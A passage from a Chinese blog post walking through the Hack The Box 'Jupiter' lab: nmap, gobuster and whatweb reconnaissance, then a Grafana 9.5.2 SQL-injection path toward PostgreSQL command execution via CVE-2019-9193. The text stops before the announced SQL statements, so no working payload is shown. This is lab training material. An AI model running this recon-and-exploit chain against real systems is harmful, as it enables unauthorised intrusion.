<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.0.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"mac"},"back2top":{"enable":true,"sidebar":true,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.json"};
  </script>

  <meta name="description" content="声明：本篇文章作者YDJA，本文属i春秋原创奖励计划，未经许可禁止转载。 外网信息收集端口扫描（nmap）1nmap -A 10.10.11.216">
<meta property="og:type" content="article">
<meta property="og:title" content="一个靶场（HTB-Jupiter）带你了解红队打点思路">
<meta property="og:url" content="http://example.com/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/index.html">
<meta property="og:site_name" content="YDJ&#39;s_Bl0g">
<meta property="og:description" content="声明：本篇文章作者YDJA，本文属i春秋原创奖励计划，未经许可禁止转载。 外网信息收集端口扫描（nmap）1nmap -A 10.10.11.216">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418381-147.png">
<meta property="og:image" content="http://example.com/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418382-148.png">
<meta property="og:image" content="http://example.com/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418382-149.png">
<meta property="og:image" content="http://example.com/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418382-150.png">
<meta property="og:image" content="http://example.com/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418382-151.png">
<meta property="og:image" content="http://example.com/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418382-152.png">
<meta property="og:image" content="http://example.com/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418382-153.png">
<meta property="og:image" content="http://example.com/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418382-154.png">
<meta property="og:image" content="http://example.com/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418382-155.png">
<meta property="og:image" content="http://example.com/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418382-156.png">
<meta property="og:image" content="http://example.com/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418382-157.png">
<meta property="og:image" content="http://example.com/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418382-158.png">
<meta property="og:image" content="http://example.com/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418382-159.png">
<meta property="og:image" content="http://example.com/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418382-160.png">
<meta property="og:image" content="http://example.com/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418382-161.png">
<meta property="og:image" content="http://example.com/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418382-162.png">
<meta property="og:image" content="http://example.com/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418382-163.png">
<meta property="og:image" content="http://example.com/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418383-164.png">
<meta property="og:image" content="http://example.com/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418383-165.png">
<meta property="og:image" content="http://example.com/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418383-166.png">
<meta property="og:image" content="http://example.com/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418383-167.png">
<meta property="og:image" content="http://example.com/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418383-168.png">
<meta property="og:image" content="http://example.com/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418383-169.png">
<meta property="og:image" content="http://example.com/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418383-170.png">
<meta property="og:image" content="http://example.com/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418383-171.png">
<meta property="og:image" content="http://example.com/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418383-172.png">
<meta property="og:image" content="http://example.com/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418383-173.png">
<meta property="og:image" content="http://example.com/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418383-174.png">
<meta property="og:image" content="http://example.com/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418383-175.png">
<meta property="og:image" content="http://example.com/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418383-176.png">
<meta property="og:image" content="http://example.com/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418383-177.png">
<meta property="og:image" content="http://example.com/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418383-178.png">
<meta property="og:image" content="http://example.com/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418383-179.png">
<meta property="og:image" content="http://example.com/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418383-180.png">
<meta property="article:published_time" content="2023-11-05T20:14:21.000Z">
<meta property="article:modified_time" content="2023-11-05T21:13:53.583Z">
<meta property="article:author" content="YDJ">
<meta property="article:tag" content="HTB">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418381-147.png">

<link rel="canonical" href="http://example.com/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>一个靶场（HTB-Jupiter）带你了解红队打点思路 | YDJ's_Bl0g</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">YDJ's_Bl0g</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>日志</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpg">
      <meta itemprop="name" content="YDJ">
      <meta itemprop="description" content="我这一生，如履薄冰">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="YDJ's_Bl0g">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          一个靶场（HTB-Jupiter）带你了解红队打点思路
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2023-11-06 04:14:21 / 修改时间：05:13:53" itemprop="dateCreated datePublished" datetime="2023-11-06T04:14:21+08:00">2023-11-06</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E6%89%93%E9%9D%B6/" itemprop="url" rel="index"><span itemprop="name">打靶</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="far fa-comment"></i>
      </span>
      <span class="post-meta-item-text">Disqus：</span>
    
    <a title="disqus" href="/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/#disqus_thread" itemprop="discussionUrl">
      <span class="post-comments-count disqus-comment-count" data-disqus-identifier="2023/11/06/一个靶场（HTB-Jupiter）带你了解红队打点思路/" itemprop="commentCount"></span>
    </a>
  </span>
  
  <br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>1.8k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>6 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>声明：本篇文章作者YDJA，本文属i春秋原创奖励计划，未经许可禁止转载。</p>
<h1 id="外网信息收集"><a href="#外网信息收集" class="headerlink" title="外网信息收集"></a>外网信息收集</h1><h3 id="端口扫描（nmap）"><a href="#端口扫描（nmap）" class="headerlink" title="端口扫描（nmap）"></a>端口扫描（nmap）</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -A 10.10.11.216</span><br></pre></td></tr></table></figure>

<span id="more"></span>

<p><img src="/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418381-147.png" alt="img"></p>
<p>开放了80和22端口，22端口的SSH服务在不知道账户密码的情况下还是比较难利用的，所以我们先重点关注80端口的web服务（需将跳转的域名添加到host文件）</p>
<p><img src="/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418382-148.png" alt="img"></p>
<h3 id="子域名爆破（gobuster）"><a href="#子域名爆破（gobuster）" class="headerlink" title="子域名爆破（gobuster）"></a>子域名爆破（gobuster）</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gobuster vhost -u http://jupiter.htb --append-domain -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 100</span><br></pre></td></tr></table></figure>

<p><img src="/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418382-149.png" alt="img"></p>
<p>发现了一个存活子域kiosk.jupiter.htb，先添加到host文件</p>
<h3 id="指纹识别（whatweb）"><a href="#指纹识别（whatweb）" class="headerlink" title="指纹识别（whatweb）"></a>指纹识别（whatweb）</h3><p>我们对现有的资产做一个指纹识别</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http://jupiter.htb</span><br><span class="line">http://kiosk.jupiter.htb</span><br></pre></td></tr></table></figure>

<p><img src="/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418382-150.png" alt="img"></p>
<p>（信息收集这里我只演示了比较基础的三个操作，其实大家都知道渗透测试的关键在于信息收集，所以这一块在时间允许的范围内肯定是做的越多越好，而且在涉及到需要爆破的操作时，字典当然也是越大越好）</p>
<h1 id="Web打点"><a href="#Web打点" class="headerlink" title="Web打点"></a>Web打点</h1><p>对于整理出来的资产信息，红队人员一般都会选择薄弱的资产入手，而薄弱资产一般指的是网站使用了一些存在历史漏洞的通用应用组件、CMS、OA系统等，也就是我们常说的1day、nday。（这里抛开0day这种核武器不谈）</p>
<h3 id="Grafana"><a href="#Grafana" class="headerlink" title="Grafana"></a>Grafana</h3><p>回到我们的目标，通过指纹识别我们可以看到主站都是一些很常见的指纹，暂时没有发现可以进一步利用的地方，而在子域kiosk.jupiter.htb我们发现了一个特殊的指纹Grafana，版本是9.5.2</p>
<p><img src="/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418382-151.png" alt="img"></p>
<p><img src="/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418382-152.png" alt="img"></p>
<p>先问一手gpt，了解一下这个应用服务</p>
<p><img src="/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418382-153.png" alt="img"></p>
<p>然后根据版本去找它的历史漏洞，由于靶场的目的是获取权限，所以我们需要重点关注一些信息泄露（找到账号密码直接ssh登录）、sql注入（也是为了rce或者拿到账户密码）或者是直接RCE的洞</p>
<p>所以确定了范围之后找到了一个sql注入的文章<a target="_blank" rel="noopener" href="https://community.grafana.com/t/sql-injection-in-api-tsdb-query-in-grafana/29713">https://community.grafana.com/t/sql-injection-in-api-tsdb-query-in-grafana/29713</a></p>
<p><img src="/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418382-154.png" alt="img"></p>
<p>入口是一个查询数据库的接口，我们通过burp对目标抓包，也可以看到一样的接口</p>
<p><img src="/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418382-155.png" alt="img"></p>
<p>通过观察请求体内容我们可以看到使用的是PostgresSQL数据库</p>
<p><img src="/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418382-156.png" alt="img"></p>
<h3 id="PostgresSQL注入到RCE"><a href="#PostgresSQL注入到RCE" class="headerlink" title="PostgresSQL注入到RCE"></a>PostgresSQL注入到RCE</h3><p>所以我们直接去搜索该数据库的注入方式，找到了一篇比较详细的文章<a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/249371.html">https://www.freebuf.com/articles/web/249371.html</a></p>
<p>我们先来验证一下</p>
<p><img src="/2023/11/06/%E4%B8%80%E4%B8%AA%E9%9D%B6%E5%9C%BA%EF%BC%88HTB-Jupiter%EF%BC%89%E5%B8%A6%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%BA%A2%E9%98%9F%E6%89%93%E7%82%B9%E6%80%9D%E8%B7%AF/1699216418382-157.png" alt="img"></p>
<p>可以看到，成功查询到了版本号</p>
<p>而有趣的是，我在查找的过程中发现了PostgresSQL数据库存在一个可以直接RCE的历史漏洞**[CVE-2019–9193]**，要是可以成功利用那我们就可以省去在数据库翻找的时间了，我们根据网上找到的文章进行复现<a target="_blank" rel="noopener" href="https://cloud.tencent.com/developer/article/1472565">https://cloud.tencent.com/developer/article/1472565</a></p>
<p>先依次执行以下四个语句（最终会执行”id“系统命令并返回结果）</p>
